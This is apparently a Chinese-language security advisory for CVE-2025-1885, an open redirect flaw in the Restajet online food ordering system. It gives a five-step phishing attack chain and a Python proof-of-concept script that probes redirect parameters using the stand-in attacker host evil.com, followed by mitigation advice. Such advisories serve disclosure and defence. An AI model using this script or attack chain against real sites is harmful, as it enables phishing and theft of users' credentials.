CVE-2025-1885 Restajet在线订餐系统开放重定向漏洞

漏洞信息

漏洞编号

CVE-2025-1885

漏洞类型

开放重定向

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Restajet Online Food Delivery System

漏洞概述

CVE-2025-1885是Restajet Information Technologies Inc.开发的在线订餐系统中的一个开放重定向（Open Redirect）漏洞。该漏洞允许攻击者将用户重定向到任意外部网站，从而实施钓鱼攻击、窃取用户凭证或进行其他恶意活动。漏洞存在于系统对URL参数的处理过程中，未对用户输入的跳转目标进行充分的验证和限制。由于该漏洞需要用户交互（点击恶意链接），攻击者通常通过钓鱼邮件或社交工程手段诱导受害者访问构造的恶意链接。开放重定向漏洞虽然看起来危害较低，但常被用于钓鱼攻击链中，增加攻击的可信度和成功率。该漏洞影响截至19122025的所有版本，厂商在收到安全通知后未作出任何回应。

技术细节

开放重定向漏洞发生在Web应用程序接受用户可控的输入并将其用于构建重定向URL的场景中。在Restajet在线订餐系统中，攻击者可以通过构造特殊的URL参数（如redirect、url、next等），将恶意网站地址注入到重定向目标中。当用户访问包含恶意参数的链接时，系统会将其重定向到攻击者控制的外部网站。攻击者通常利用可信域名的信誉来提高钓鱼成功率，例如使用类似login.example.com?redirect=evil.com的构造方式。该漏洞的CVSS向量显示攻击复杂度低（AC:L），但需要低权限用户参与（PR:L）并触发用户交互（UI:R），这意味着攻击者需要诱导已登录用户点击恶意链接。防御此类漏洞需要对所有重定向目标进行严格的URL白名单验证，拒绝任何指向外部域名的重定向请求。

攻击链分析

STEP 1

步骤1

攻击者识别Restajet在线订餐系统中存在开放重定向漏洞的端点，通常是带有redirect、url等参数的重定向功能页面

STEP 2

步骤2

攻击者构造恶意URL，将外部钓鱼网站地址作为redirect参数值，例如：https://target-site.com/login?redirect=https://evil.com/fake-login

STEP 3

步骤3

攻击者通过钓鱼邮件、社交媒体或即时通讯工具向目标用户发送包含恶意链接的消息，利用可信域名提高点击率

STEP 4

步骤4

目标用户点击恶意链接后，被重定向到攻击者控制的钓鱼网站，该网站可能伪装成合法的登录页面

STEP 5

步骤5

用户在钓鱼页面输入凭据或敏感信息，攻击者窃取这些数据用于账户劫持或其他恶意活动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-1885 Open Redirect PoC
# Target: Restajet Online Food Delivery System
# Vulnerability: URL Redirection to Untrusted Site

TARGET_URL = "http://target-site.com"
MALICIOUS_URL = "https://evil.com/phishing"

def test_open_redirect():
    """
    Test for Open Redirect vulnerability in Restajet Online Food Delivery System
    The vulnerable parameter may be: redirect, url, next, destination, etc.
    """
    vulnerable_params = [
        "redirect",
        "url",
        "next",
        "destination",
        "redir"
    ]
    
    for param in vulnerable_params:
        # Construct malicious URL with redirect parameter
        test_url = f"{TARGET_URL}?{param}={MALICIOUS_URL}"
        
        try:
            response = requests.get(test_url, allow_redirects=False)
            
            # Check if redirect leads to external site
            if response.status_code in [301, 302, 303, 307, 308]:
                location = response.headers.get('Location', '')
                if MALICIOUS_URL in location or 'evil.com' in location:
                    print(f"[+] VULNERABLE! Parameter '{param}' allows open redirect")
                    print(f"[+] Redirects to: {location}")
                    return True
        except requests.exceptions.RequestException as e:
            print(f"[-] Error testing {param}: {e}")
    
    print("[-] No open redirect vulnerability found")
    return False

if __name__ == "__main__":
    test_open_redirect()

影响范围

Restajet Online Food Delivery System <= 19122025

防御指南

临时缓解措施

在厂商发布正式修复补丁前，可通过以下措施临时缓解：1) 禁用或限制重定向功能的使用；2) 在Web服务器层面配置URL重写规则，阻止包含外部域名的重定向参数；3) 使用内容安全策略（CSP）响应头限制页面重定向行为；4) 对用户进行安全意识培训，提高对钓鱼攻击的警惕性。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-1885
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-1885
3 Details https://www.cvedetails.com/cve/CVE-2025-1885/
4 VulDB https://vuldb.com/cve/CVE-2025-1885
5 Link https://www.usom.gov.tr/bildirim/tr-25-0469